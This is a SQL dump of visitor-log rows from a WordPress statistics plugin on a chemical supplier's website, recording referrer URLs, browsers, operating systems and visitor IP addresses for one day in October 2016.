INSERT INTO `wp_statistics_visitor` VALUES (9741, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.190.93.184', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9742, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.15', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9743, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.6', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9744, '2016-10-21', 'https://www.google.com.ar/', 'Chrome', 'Android', '39.0.2171.93', '', '186.158.141.212', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9745, '2016-10-21', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '130.76.24.15', '000', 20, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9746, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '176.45.24.95', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9747, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '128.70.111.197', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9748, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.144', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9749, '2016-10-21', 'https://www.google.com.br/', 'Edge', 'Windows', '14.14393', '', '187.64.152.219', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9750, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '68.72.228.37', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9751, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '53.0.2785.143', '', '45.72.145.229', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9752, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '64.83.180.133', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9753, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '62.176.7.182', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9754, '2016-10-21', 'https://ntb.mschem.com/miller/pdf/MS-538,%20539.pdf', 'Chrome', 'Windows', '53.0.2785.143', '', '144.191.148.6', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9755, '2016-10-21', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '216.8.150.65', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9756, '2016-10-21', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '68.65.44.98', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9757, '2016-10-21', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '50.241.216.33', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9758, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '63.145.101.232', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9759, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '223.218.53.58', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9760, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.191.241.167', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9761, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '142.59.125.211', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9762, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '52.0.2743.116', '', '142.59.125.211', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9763, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '192.58.125.225', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9764, '2016-10-21', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiqvITTpezPAhWBG5QKHTXBCE0QFggfMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '68.14.253.72', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9765, '2016-10-21', 'https://www.adsensecustomsearchads.com/afs/ads?q=qt%20epoxy%20resin&adpage=1&ccfn=amazon_search_numbered_wide_underline&r=m&fexp=21404%2C7000107&client=amazon&channel=g-channel-92%2Bg-channel-136%2Bg-channel-276%2Bg-channel-330&hl=en&adtest=off&type=0&oe=UTF-8&ie=UTF-8&jsei=3&format=n6&ad=n6&nocache=3951477066832658&num=0&output=uds_ads_only&v=3&bsl=10&u_his=2&u_tz=-360&dt=1477066832659&u_w=1366&u_h=768&biw=-12245933&bih=-12245933&isw=1122&ish=1&psw=1122&psh=0&frm=2&uio=uv3-&jsv=13959&rurl=httpss%3A%2F%2Fd14qd3he45186l.cloudfront.net%2Fads-search32.html&referer=www.amazon.com', 'Edge', 'Windows', '14.14393', '', '174.56.99.95', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9766, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '108.179.8.203', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9767, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '192.5.58.223', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9768, '2016-10-21', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiotMObqezPAhXKG4EKHRbhC3AYABAA&sig=AOD64_3tQlxH9fNRWDBHOSjki6WWmdWUfA&rct=j&q=&ved=0ahUKEwiOx7-bqezPAhUIdj4KHU48CsEQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '98.102.95.2', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9769, '2016-10-21', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0ahUKEwjM3KmtqezPAhUExmMKHV4gBEUQFgg-MAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepikure-w%2F&usg=AFQjCNHEXqhjk-N_pRnZi-f1vbzhvmYcwA&bvm=bv.136593572,d.cGc', 'Safari', 'Macintosh', '6.1.6', '', '47.149.65.251', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9770, '2016-10-21', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=1&ved=0ahUKEwif3OjSqezPAhVK8IMKHRIeBxkQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136499718,d.amc', 'MSIE', 'Windows', '10.0', '', '207.195.114.101', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9771, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '206.169.71.254', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9772, '2016-10-21', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '125.209.235.186', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9773, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '52.0.2743.116', '', '125.209.235.180', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9774, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '36.79.126.173', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9775, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '192.10.168.159', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9776, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '206.121.172.34', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9777, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '66.86.40.243', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9778, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '5.166.198.45', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9779, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '47.149.223.47', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9780, '2016-10-21', 'https://www.google.bg/', 'Chrome', 'Windows', '53.0.2785.143', '', '84.40.102.118', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9781, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.124.12.164', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9782, '2016-10-21', 'https://www.bing.com/', 'Safari', 'Macintosh', '10.0', '', '138.5.89.183', '000', 32, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9783, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.153.7', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9784, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.67.142.115', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9785, '2016-10-21', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '10.0', '', '24.127.212.230', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9786, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '192.197.128.19', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9787, '2016-10-21', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '73.139.96.237', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9788, '2016-10-21', 'https://www.bing.com/search?q=cream%2Fgrease++dental+handpiece+lubricants&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.62', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9789, '2016-10-21', 'https://www.miller-stephenson.com/product/dental-lubricant/', 'MSIE', 'Windows', '9.0', '', '204.79.180.180', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9790, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.110.156.140', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9791, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '74.219.66.18', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9792, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.59.104.171', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9793, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.134.71.174', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9794, '2016-10-21', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '12.237.58.146', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9795, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.159.66.77', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9796, '2016-10-21', 'https://r.search.yahoo.com/_ylt=AwrT6V3oUQpYjEkAW2onnIlQ;_ylu=X3oDMTE0ZXZhY2hjBGNvbG8DZ3ExBHBvcwMyBHZ0aWQDRkZVSTNDMl8xBHNlYwNzcg--/RV=2/RE=1477100137/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fproduct%2fepon-813%2f/RK=0/RS=y91p_NWhrxbKIMJImhcLbPNPSLs-', 'Firefox', 'Windows', '49.0', '', '128.18.19.198', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9797, '2016-10-21', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiXuePgt-zPAhVPWoYKHa9SCQwYABAF&sig=AOD64_2NDRUmx-SqtDMqSnXJmEy9LPh0CQ&rct=j&q=&ved=0ahUKEwjm8d7gt-zPAhXGNT4KHan-BfYQ0QwIJw&adurl=', 'MSIE', 'Windows', '7.0', '', '199.64.7.59', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9798, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '128.75.42.133', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9799, '2016-10-21', 'https://www.google.com/', 'Safari', 'iPad', '9.0', '', '172.101.219.223', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9800, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '144.81.85.10', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9801, '2016-10-21', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwijkuTDuuzPAhUNxmMKHTLrC8QQFgg_MAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fxp-1a6%2F&usg=AFQjCNHEopLCoQnbkwVHP259veFpI36KhQ&sig2=ydOXO9HpDjk7ECG_9Ez14w&bvm=bv.136593572,d.cGc', 'MSIE', 'Windows', '11.0', '', '69.46.103.36', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9802, '2016-10-21', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '71.88.58.198', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9803, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.59', '', '47.49.16.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9804, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.11.9600.18499', '', '173.167.26.113', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9805, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.115.90.247', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9806, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.89', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9807, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '66.185.164.236', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9808, '2016-10-21', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjPpI74vOzPAhVUJYEKHU3nDecYABAA&sig=AOD64_3gYeTzp7q81cLYj2C24ORwUiypig&rct=j&frm=1&q=&ved=0ahUKEwjr1or4vOzPAhUK6iYKHbUXCiAQ0QwIGg&adurl=', 'MSIE', 'Windows', '10.0', '', '66.55.11.195', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9809, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.169.227.84', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9810, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '159.148.3.185', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9811, '2016-10-21', 'https://www.miller-stephenson.com', 'imagetrckr', 'Unknown', 'Unknown', '', '54.208.30.222', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9812, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '199.26.78.242', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9813, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '53.0.2785.143', '', '76.88.35.111', '000', 20, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9814, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '64.73.228.250', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9815, '2016-10-21', 'https://www.google.de/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0ahUKEwiD84XcwezPAhUIchQKHUlKAtUQFghTMAc&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fkrytox%2F&usg=AFQjCNGn7PFDgABBgpzqq7KdESkbBtph0Q&bvm=bv.136499718,bs.1,d.bGs', 'MSIE', 'Windows', '11.0', '', '213.71.177.11', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9816, '2016-10-21', 'https://www.miller-stephenson.com/product/ms-580582/', 'Chrome', 'Windows', '53.0.2785.143', '', '67.201.11.195', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9817, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '204.27.156.147', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9818, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '47.0', '', '24.238.77.57', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9819, '2016-10-21', 'https://search.aol.com/aol/search?s_chn=prt_hmpg&q=stevenson+chemical+danbury+ct&s_it=non_chrome-hyplogusaolp00000112', 'Chrome', 'Windows', '49.0.2623.112', '', '24.63.131.105', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9820, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '159.206.84.20', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9821, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '73.240.96.44', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9822, '2016-10-21', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwjEkuy0xOzPAhVEID4KHQRzCxAQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.136499718,d.cWw', 'MSIE', 'Windows', '11.0', '', '65.195.118.118', '000', 25, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9823, '2016-10-21', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '64.183.73.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9824, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '48.0', '', '146.0.74.195', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9825, '2016-10-21', 'https://www.google.ca/', 'Firefox', 'Windows', '49.0', '', '205.236.3.233', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9826, '2016-10-21', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjwk5PNxezPAhXiz1QKHX_EB34QFghHMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Ftribosys%2Fptfe-dryfilm-lubricants%2F&usg=AFQjCNGbkrsEd1oupMqq-nMxkLQTYxMOmw&bvm=bv.136499718,d.cGw', 'MSIE', 'Windows', '11.0', '', '38.96.42.204', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9827, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.183.40.137', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9828, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '71.200.145.100', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9829, '2016-10-21', 'https://www.miller-stephenson.com', 'Microsoft', 'Unknown', 'Unknown', '', '65.195.118.118', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9830, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.173.80.173', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9831, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Macintosh', '54.0.2840.59', '', '150.182.169.221', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9832, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '70.81.16.81', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9833, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '50.83.163.97', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9834, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '46.99.16.180', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9835, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '172.27.152.51', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9836, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.23.203.249', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9837, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '38.81.65.42', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9838, '2016-10-21', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '9.0', '', '173.169.213.217', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9839, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '130.76.24.15', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9840, '2016-10-21', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiDsNnb0OzPAhXLej4KHbfsADYQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&sig2=Oax-o4HFnnIJyqFzbS6Xcw&bvm=bv.136499718,d.cWw', 'MSIE', 'Windows', '11.0', '', '173.162.201.213', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9841, '2016-10-21', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '173.167.153.82', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9842, '2016-10-21', 'https://www.eis-inc.com/suppliers/miller-stephenson.asp', 'MSIE', 'Windows', '11.0', '', '65.196.168.6', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9843, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '109.241.48.197', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9844, '2016-10-21', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '127.0.0.1', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9845, '2016-10-21', 'https://www.google.lt/', 'Chrome', 'Windows', '53.0.2785.143', '', '88.222.61.49', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9846, '2016-10-21', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '75.45.6.183', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9847, '2016-10-21', 'https://www.google.ca', 'Firefox', 'Windows', '40.0', '', '159.206.84.20', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9848, '2016-10-21', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '128.115.190.41', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9849, '2016-10-21', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '47.138.212.52', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9850, '2016-10-21', 'https://www.miller-stephenson.com/product/epon-828/', 'Firefox', 'Windows', '45.0', '', '134.223.230.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9851, '2016-10-21', 'https://www.google.ca/', 'Firefox', 'Windows', '49.0', '', '72.38.43.92', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9852, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Chrome OS', '53.0.2785.144', '', '67.176.93.73', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9853, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.108', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9854, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.85', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9855, '2016-10-21', 'https://www.google.com/aclk?sa=L&ai=DChcSEwiFt8TQ1-zPAhXXEYEKHdB5C_QYABAA&sig=AOD64_1eDZpjrlEO5961StsNmeyenL1qsA&rct=j&q=&ved=0ahUKEwiZlcHQ1-zPAhVLSSYKHVOeCsIQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '50.233.58.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9856, '2016-10-21', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjU1bWy2OzPAhXTNoEKHSOUAAcYABAA&sig=AOD64_22tPbLg2uSGzev-AJoeXuo7BlGfA&rct=j&q=&ved=0ahUKEwjRhrGy2OzPAhXM4iYKHbsyC90Q0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '74.218.78.226', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9857, '2016-10-21', 'https://www.google.com.pe/', 'Chrome', 'Windows', '53.0.2785.143', '', '181.65.246.50', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9858, '2016-10-21', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '6.2.8', '', '166.137.246.118', '000', 24, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9859, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.84.126.76', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9860, '2016-10-21', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '173.15.36.157', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9861, '2016-10-21', 'https://www.miller-stephenson.com', 'Safari', 'Linux', '537.36', '', '192.0.100.186', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9862, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '82.140.78.78', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9863, '2016-10-21', 'https://www.google.com/', 'Edge', 'Windows', '14.14393', '', '47.21.139.146', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9864, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.17.0.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9865, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '195.154.146.225', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9866, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.26.233.82', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9867, '2016-10-21', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '216.165.167.19', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9868, '2016-10-21', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '50.62.208.38', '000', 40, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9869, '2016-10-21', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwiLsZHq4OzPAhWCRyYKHVm8A8EQFgg9MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fvertrel-mca%2F&usg=AFQjCNEn7XKmhJNqkvKwcWqVCR7ahXxqZA', 'MSIE', 'Windows', '11.0', '', '71.42.217.202', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9870, '2016-10-21', 'https://www.miller-stephenson.com', 'Opera Next', 'Windows', '36.0.2130.32', '', '46.119.127.129', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (9871, '2016-10-21', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '82.12.227.245', '000', 3, 0); 
